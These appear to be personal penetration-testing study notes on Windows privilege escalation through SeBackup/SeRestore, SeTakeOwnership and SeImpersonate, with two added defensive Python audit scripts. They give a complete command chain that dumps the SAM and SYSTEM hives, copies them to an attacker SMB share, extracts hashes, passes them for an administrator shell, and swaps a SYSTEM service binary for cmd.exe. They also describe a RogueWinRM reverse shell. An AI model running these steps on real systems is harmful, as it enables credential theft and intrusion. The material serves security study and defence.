Abusing privileges

To view the privileges of the current user:

C:\> whoami /priv

SeBackup / SeRestore

The impacket toolkit can be used to perform various tasks such as starting an SMB server, dumping secrets from hives in the Windows registry, and running commands with psexec, among many others.

Refer to my impacket notes for more information.

Suppose we have gained a remote shell on a server with the SeBackup and SeRestore privileges:

C:\target> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
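An added example (not from the original notes) that parses whoami /priv output and flags the privileges discussed on this page (SeBackup, SeRestore, SeTakeOwnership, SeImpersonate, SeAssignPrimaryToken). The sample output is constructed, not captured from a real host.

```python
"""Audit `whoami /priv` output for privileges that are abusable for escalation."""
import re

# Privileges covered on this page and why each one matters to a defender.
# A Disabled privilege is still held by the token: the holder can re-enable it
# with AdjustTokenPrivileges, so it is reported too.
RISKY_PRIVILEGES = {
    "SeBackupPrivilege": "can read any file, e.g. export the SAM and SYSTEM hives",
    "SeRestorePrivilege": "can write any file or registry key regardless of its ACL",
    "SeTakeOwnershipPrivilege": "can take ownership of service binaries under System32",
    "SeImpersonatePrivilege": "can impersonate a higher-privileged caller's token",
    "SeAssignPrimaryTokenPrivilege": "can start a process under a SYSTEM token",
}

# Constructed sample of `whoami /priv` output for a low-privileged service account.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeBackupPrivilege             Back up files and directories             Enabled
SeRestorePrivilege            Restore files and directories             Enabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(text):
    """Return {privilege_name: state} from the table printed by `whoami /priv`."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def find_risky(privs):
    """Return {name: (state, reason)} for every risky privilege the token holds."""
    return {name: (state, RISKY_PRIVILEGES[name])
            for name, state in privs.items() if name in RISKY_PRIVILEGES}

if __name__ == "__main__":
    for name, (state, reason) in find_risky(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)).items():
        print(f"{name:<32}{state:<10}{reason}")
```

Run it against the real output of whoami /priv to get a quick list of which of these privileges the current token holds and what each one allows.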

Due to these privileges, we are able to save the contents of the SAM and SYSTEM registry hives to a location of our choice (C:\Users\jarrett\system.hive and C:\Users\jarrett\sam.hive in this case):

C:\target> reg save hklm\system C:\Users\jarrett\system.hive
C:\target> reg save hklm\sam C:\Users\jarrett\sam.hive

The command below starts a simple SMB server on the attacker machine with a network share named public pointing to the share directory. This allows us to transfer the files from the target machine to the attacker at a particular share point (share folder).

Attacker machine

attacker@attacker_ip:~$ impacket-smbserver -smb2support -username jarrett -password mynamejeff public share

The commands below copy system.hive and sam.hive from the specified directory to the share on the attacker machine.

Target machine

C:\target> copy c:\users\jarrett\system.hive \\<attacker_ip>\public\
C:\target> copy c:\users\jarrett\sam.hive \\<attacker_ip>\public\

The next few commands should be run from the attacker machine.

The command below dumps the hashes from the sam.hive and system.hive files present in the current folder (specified by the LOCAL target option).

attacker@attacker_ip:~/share$ ls 
sam.hive system.hive

attacker@attacker_ip:~/share$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket vxxx - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...:::
Guest:xxx:xxx:xxx::
Administrator:xx12xx:xx34xx::
...

The command below uses the hashes found by the impacket-secretsdump command above to authenticate as the administrator user. This provides us with a remote shell as the administrator user on the target Windows machine.

attacker@attacker_ip:~/share$ impacket-psexec -hashes xx12xx:xx34xx administrator@10.10.x.x
...

C:\Windows\system32> 

SeTakeOwnership

This permission allows a user to take ownership of any object on the system, including files and registry keys.

C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
...

Suppose we have found a service on the target system that executes an .exe file with SYSTEM privileges (an example would be utilman.exe). Let's name that file priv.exe. Due to our SeTakeOwnership privilege, we are able to take ownership of that file with the command below:

C:\> takeown /f C:\Windows\System32\priv.exe

At this point, we are able to grant ourselves any permissions we need over the file. The command below gives our current user (jarrett) full access (F) to the priv.exe file at the specified location.

C:\> icacls C:\Windows\System32\priv.exe /grant jarrett:F

Finally, we can copy any file of choice to the target file we have full access to:

Take note to be in the correct directory when using the terminal, or else provide the full path.

The command below copies the cmd.exe file to priv.exe:

C:\Windows\System32\> copy cmd.exe priv.exe

This provides us with a command prompt with SYSTEM privileges whenever the particular service mentioned above is started.
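From the defender's side, the icacls /grant step above leaves a trace in the binary's ACL. The following added example (not from the original notes) parses an icacls listing of a System32 binary and flags write-capable entries granted to anything other than SYSTEM, Administrators or TrustedInstaller. The icacls output is constructed to reflect the jarrett:F grant from this section.

```python
"""Flag write-capable ACEs on a System32 binary that belong to untrusted principals."""
import re

# Principals expected to hold write rights on binaries under System32.
TRUSTED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators", r"NT SERVICE\TrustedInstaller"}
# icacls simple and specific rights that allow modifying the file or its security.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D", "DC"}

# Constructed icacls output after `icacls C:\Windows\System32\priv.exe /grant jarrett:F`.
SAMPLE_ICACLS = r"""
C:\Windows\System32\priv.exe NT SERVICE\TrustedInstaller:(F)
                             BUILTIN\Administrators:(RX)
                             NT AUTHORITY\SYSTEM:(RX)
                             BUILTIN\Users:(RX)
                             TARGET\jarrett:(F)

Successfully processed 1 files; Failed processing 0 files
"""

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")

def parse_icacls(text, path):
    """Return a list of (principal, rights) pairs from an icacls listing of `path`."""
    aces = []
    for line in text.splitlines():
        s = line.strip()
        if s.startswith(path):          # first line carries the path before the first ACE
            s = s[len(path):].strip()
        m = ACE_RE.match(s)
        if m:
            aces.append((m.group("principal"), m.group("rights")))
    return aces

def can_write(rights):
    """True if any right inside the parenthesised groups allows modification."""
    groups = re.findall(r"\(([^)]*)\)", rights)      # e.g. "(OI)(CI)(F)" or "(R,W)"
    return any(r in WRITE_RIGHTS for g in groups for r in g.split(","))

def check_icacls(text, path=r"C:\Windows\System32\priv.exe"):
    """Return the (principal, rights) entries that an untrusted account could abuse."""
    return [(p, r) for p, r in parse_icacls(text, path)
            if p not in TRUSTED and can_write(r)]

if __name__ == "__main__":
    for principal, rights in check_icacls(SAMPLE_ICACLS):
        print(f"untrusted write access: {principal} {rights}")
```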

SeImpersonate / SeAssignPrimaryToken

  • SeImpersonate: Privilege that allows a user to impersonate another user’s security context

  • SeAssignPrimaryToken: Privilege that allows assignments of a new security token to a process. This allows that process to impersonate a higher-privileged user (such as SYSTEM).

Breakdown of how the RogueWinRM exploit tool works (as of the time of writing, I wasn't able to find a comprehensive technical guide on how it works, so I have pieced together the key points from research on the main concepts involved in this exploit):

  1. The Background Intelligent Transfer Service (BITS) is started, which automatically initiates a connection to port 5985 (used by WinRM) using SYSTEM privileges.

  • Port 5985 is typically used by the WinRM service, which exposes a PowerShell console for remote use over the network.

  • The SYSTEM-level authentication credentials can be captured from the above-mentioned connection to WinRM on the local target machine (port 5985).

  2. The captured authentication credentials can be used to execute a payload of choice (specified as an argument to the RogueWinRM tool) with SYSTEM-level privileges. This is possible because the SeImpersonate and SeAssignPrimaryToken privileges are set on the user on the target machine.

  • A reverse shell connection can be established to a remote attacker server, essentially providing a SYSTEM-level shell.
